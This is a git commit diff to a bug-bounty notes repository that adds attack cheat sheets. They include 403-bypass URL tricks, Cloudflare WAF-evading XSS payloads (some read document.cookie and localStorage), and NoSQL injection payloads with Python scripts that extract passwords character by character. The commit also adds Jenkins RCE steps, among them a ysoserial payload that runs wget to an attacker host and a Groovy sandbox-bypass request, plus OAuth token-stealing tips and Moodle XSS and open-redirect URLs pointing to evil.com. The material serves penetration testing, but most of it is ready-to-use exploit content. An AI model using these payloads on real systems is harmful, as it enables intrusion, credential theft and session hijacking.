Major Update, adding some tips

pull/5/head
Muhammad Daffa 2021-07-21 22:38:57 +07:00
parent a71bcdd231
commit 338475aee1
10 changed files with 334 additions and 22 deletions

View File

@ -1,5 +1,11 @@
# 403 Forbidden Bypass # 403 Forbidden Bypass
## Tools
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
## Exploit
1. Using "X-Original-URL" header 1. Using "X-Original-URL" header
``` ```
GET /admin HTTP/1.1 GET /admin HTTP/1.1
@ -21,15 +27,18 @@ Try this to bypass
http://target.com/%2e/admin => 200 http://target.com/%2e/admin => 200
``` ```
3. Try add dot (.) and slash (/) in the URL 3. Try add dot (.) slash (/) and semicolon (;) in the URL
``` ```
http://target.com/admin => 403 http://target.com/admin => 403
``` ```
Try this to bypass Try this to bypass
``` ```
http://target.com/admin/. => 200 http://target.com/secret/. => 200
http://target.com//admin// => 200 http://target.com//secret// => 200
http://target.com/./admin/./ => 200 http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200
``` ```
4. Add "..;/" after the directory name 4. Add "..;/" after the directory name
@ -58,4 +67,6 @@ Host: victim.com
X­-Original-­URL: /admin X­-Original-­URL: /admin
``` ```
Source: [@iam_j0ker](https://twitter.com/iam_j0ker) Source:
- [@iam_j0ker](https://twitter.com/iam_j0ker)
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)

View File

@ -336,5 +336,50 @@ javascript://%250Aalert(1)
<!--><svg onload=alert(1)--> <!--><svg onload=alert(1)-->
``` ```
## Bypass WAF
1. Cloudflare
```
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<img ignored=() src=x onerror=prompt(1)>
```
Reference: Reference:
- [Brute Logic](https://brutelogic.com.br/) - [Brute Logic](https://brutelogic.com.br/)

View File

@ -1,14 +1,14 @@
# Broken Link Hijacking # Broken Link Hijacking
## **Introduction**
Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page
## **How to Find** ## Tools
- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
## Definition
Broken Link Hijacking exists whenever a target links to an expired domain or page
## How to find
1. Manually find external links on the target site (For example, check some links to social media accounts) 1. Manually find external links on the target site (For example, check some links to social media accounts)
2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command 2. Try using tools to find broken link, for example using tools that listed in this readme
```
blc -rof --filter-level 3 https://vuln.com/
```
References: References:
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) - [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)

10
Misc/Exposed API keys.md Normal file
View File

@ -0,0 +1,10 @@
# Exposed API Keys
## Tools
* [Key-Checker](https://github.com/daffainfo/Key-Checker)
## Definition
Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
## How to exploit
[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys

View File

@ -1 +1,143 @@
# Soon! ## NoSQL injection
## Tools
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
## Exploit
### Authentication Bypass
Basic authentication bypass using not equal ($ne) or greater ($gt)
```
in the request
- username[$ne]=toto&password[$ne]=toto
- login[$regex]=a.*&pass[$ne]=lol
- login[$gt]=admin&login[$lt]=test&pass[$ne]=1
- login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
```
```json
The output is
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
```
### Extract length information
```json
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```
### Extract data information
```json
in URL
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### Extract data with "in"
```json
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
### PHP Arbitrary Function Execution
```json
"user":{"$func": "var_dump"}
```
## Blind NoSQL
### POST
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/json'}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
if 'OK' in r.text or r.status_code == 302:
print("Found one more char : %s" % (password+c))
password += c
```
### GET
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username='admin'
password=''
u='http://example.org/login'
while True:
for c in string.printable:
if c not in ['*','+','.','?','|', '#', '&', '$']:
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
r = requests.get(u + payload)
if 'Yeah' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
Another example using sleep to check vuln or not
```
'%2bsleep(1)%2b'
```
### MongoDB Payloads
```bash
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
## References
* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)

13
OAuth Misconfiguration.md Normal file
View File

@ -0,0 +1,13 @@
# OAuth Misconfiguration
1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
2. Change Referral header to attacker(.)com while requesting OAuth.
3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
4. OAuth Token Re-use.
5. Missing or broken state parameter.
6. Lack of origin check.
7. Open Redirection on another endpoint > Use it in redirect_uri
8. If there is an email parameter after signin then try to change the email parameter to victim's one.
9. Try to remove email from the scope and add victim's email manually.
10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
11. Check if its leaking client_secret parameter.
12. Go to the browser history and check if the token is there.

View File

@ -1,18 +1,24 @@
# All about bug bounty # All about bug bounty
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too! These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
![](https://img.shields.io/github/issues/daffainfo/AllAboutBugBounty)
![](https://img.shields.io/github/forks/daffainfo/AllAboutBugBounty)
![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty)
![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
## List ## List
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
- SQL Injection (SOON)
- NoSQL Injection (SOON)
- Local File Inclusion (SOON)
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md) - [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md) - [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md) - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
- Local File Inclusion (SOON)
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
- SQL Injection (SOON)
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md) - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
## List Bypass ## List Bypass
@ -28,7 +34,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
## List Framework ## List Framework
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md) - [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD) - [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
## Miscellaneous ## Miscellaneous
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md) - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
@ -38,7 +44,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md) - [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md) - [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
## Technologies
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
## Reconnaissance ## Reconnaissance
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md) - [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)

66
Technologies/Jenkins.md Normal file
View File

@ -0,0 +1,66 @@
## Jenkins
1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
```bash
java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
./jenkins_rce.py jenkins_ip jenkins_port payload.out
```
2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:
```bash
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
```
3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
4. CVE-2019-1003030
How to Exploit:
- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
```
GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
} HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
Connection: close
Upgrade-Insecure-Requests: 1
```
URL Encoding the following for RCE
```
public class x {
public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
}
```
to
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
How to exploit:
- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
Reference:
- https://github.com/gquere/pwn_jenkins

View File

@ -60,3 +60,6 @@ Connection: close
``` ```
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
``` ```
Reference:
- https://twitter.com/harshbothra

12
Technologies/Moodle.md Normal file
View File

@ -0,0 +1,12 @@
# Moodle
1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
```
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
```
2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
```
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
```